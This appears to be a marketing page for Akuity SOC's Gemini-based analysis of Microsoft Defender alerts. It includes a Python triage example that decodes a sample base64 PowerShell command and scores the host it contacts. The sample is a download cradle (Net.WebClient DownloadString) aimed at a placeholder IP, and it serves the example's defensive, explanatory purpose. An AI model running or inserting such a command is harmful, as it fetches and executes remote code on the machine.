Translate the complexity of Defender threats with Google Gemini AI.
The main adversary of a SOC analyst is not always the hacker; it is the volume of data. Akuity SOC natively embeds Gemini AI to instantly translate complex JSON payloads, reduce mental fatigue and eliminate false positives.
Manual analysis of Defender logs destroys the productivity of your analysts
Tedious reading of raw JSON files containing thousands of lines. Manual decoding of obfuscated PowerShell scripts.
Instant summary: technical summary generated by AI as soon as the ticket is opened, in less than 3 seconds.
Manual report writing for management, taking hours for each critical incident.
Gemini Double Discourse: raw engineer report + clear COMEX summary, generated simultaneously and automatically.
Human processing of countless false positives: up to 80% of alert volume is unqualified background noise.
Out-of-band AI: automatic qualification of probable false positives with a contextualized dangerousness score.
How Gemini AI is revolutionizing Defender log analysis
The Gemini Double Discourse (Tech & COMEX)
The analysis tab generates a Double Discourse summary: a detailed technical description (attack vectors, processes involved) for the engineer, AND a plain-language recommendation ready to be shared with the COMEX.
Contextual Chat Analyst & AI
The Ticket Panel includes a chat powered by Gemini that knows the full context of the ticket. Ask it to explain an obfuscated Base64 script, or to generate a typical warning email to send to the compromised user.
Intelligent Reputation Analysis
When the AI encounters an IOC (SHA256 hash, IP), it generates a contextual analyst note with a weighted dangerousness score. Bonus if the IP belongs to Azure/AWS; penalty if the domain is recent (< 100 days) with a malware signature.
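To make the Base64 decoding and the weighted scoring described above concrete, here is an added Python example that is not Akuity's code: it decodes a constructed PowerShell encoded command, extracts the URL host as an indicator, and scores it with the bonus/penalty rules stated on this page. The baseline of 50, the weights, the 70 verdict threshold and the enrichment record (standing in for an OTX lookup) are assumptions.

```python
import base64
import re

# Constructed sample, not a real Defender alert: a PowerShell command encoded the way
# -EncodedCommand expects it (base64 over UTF-16LE), built inline so this runs offline.
SAMPLE_CMD = "(New-Object Net.WebClient).DownloadString('http://203.0.113.45/update')"
ENCODED_CMD = base64.b64encode(SAMPLE_CMD.encode("utf-16le")).decode("ascii")

# Assumed enrichment context (cloud ownership, domain age, signature hit). A real SOC
# would fetch this from a reputation service such as the OTX lookup the page mentions.
ENRICHMENT = {
    "203.0.113.45": {"cloud": None, "age_days": 12, "malware_sig": True},
}

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def decode_encoded_command(blob: str) -> str:
    """Reverse PowerShell's -EncodedCommand encoding: base64, then UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16le")


def extract_hosts(script: str) -> list[str]:
    """Pull the network indicators (URL hosts) an analyst would want to qualify."""
    return sorted(set(URL_HOST_RE.findall(script)))


def dangerousness(ctx: dict) -> int:
    """Weighted 0-100 score following the page's stated heuristic (weights assumed)."""
    score = 50                                    # neutral starting point (assumption)
    if ctx.get("cloud") in ("Azure", "AWS"):      # bonus: shared cloud space, often benign
        score -= 20
    if ctx.get("age_days", 10**9) < 100 and ctx.get("malware_sig"):
        score += 40                               # penalty: recent domain with a signature
    return max(0, min(100, score))


def triage(blob: str, enrichment: dict) -> list[dict]:
    """Decode the alert payload and produce one analyst note per indicator found."""
    script = decode_encoded_command(blob)
    notes = []
    for host in extract_hosts(script):
        score = dangerousness(enrichment.get(host, {}))
        verdict = "probable true positive" if score >= 70 else "probable false positive"
        notes.append({"ioc": host, "score": score, "verdict": verdict})
    return notes


if __name__ == "__main__":
    for note in triage(ENCODED_CMD, ENRICHMENT):
        print(note)
```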
Qualification of an obfuscation attack in 3 steps
Detection — Unreadable CMD command on financial server
[High] Microsoft Defender reports the execution of an obfuscated CMD command on a financial server. The alert is classified as suspicious without being qualified.
AI Translation — Instant Deobfuscation
[Gemini AI active] The analyst opens the alert. Gemini has already deobfuscated the command, revealing an attempt to download a payload from a C2 domain. The COMEX summary is already ready.
Validation — The analyst confirms and isolates
[True Positive] The analyst uses the AI chat to check the dangerousness of the IP via AlienVault OTX. Confident, he declares the alert a True Positive and initiates server isolation.
Go deeper into AI analysis of Defender logs
Why reading Defender JSON logs is your SOC's worst enemy
Manually parsing Microsoft Defender JSON payloads slows down your incident response. Find out how AI automates this decoding.
Cognitive overload in SOC: How AI qualifies 50% of your false positives
Alert fatigue destroys the productivity of cyber analysts. Discover how out-of-band AI automatically qualifies background noise.
Decoding PowerShell obfuscation: Human analysis versus Gemini
Attackers hide their malicious code by encoding their scripts. Learn how Gemini AI instantly decodes PowerShell obfuscation.
The Double Cyber Discourse: How to translate logs for the COMEX
In the midst of a cyber crisis, communication with management is strategic. Discover how Akuity SOC's Double Discourse translates Defender logs for the COMEX.
Vertex AI and privacy: Why your logs don't train AI
The use of AI in cybersecurity raises privacy issues. Learn how Vertex AI and Akuity protect your Microsoft data.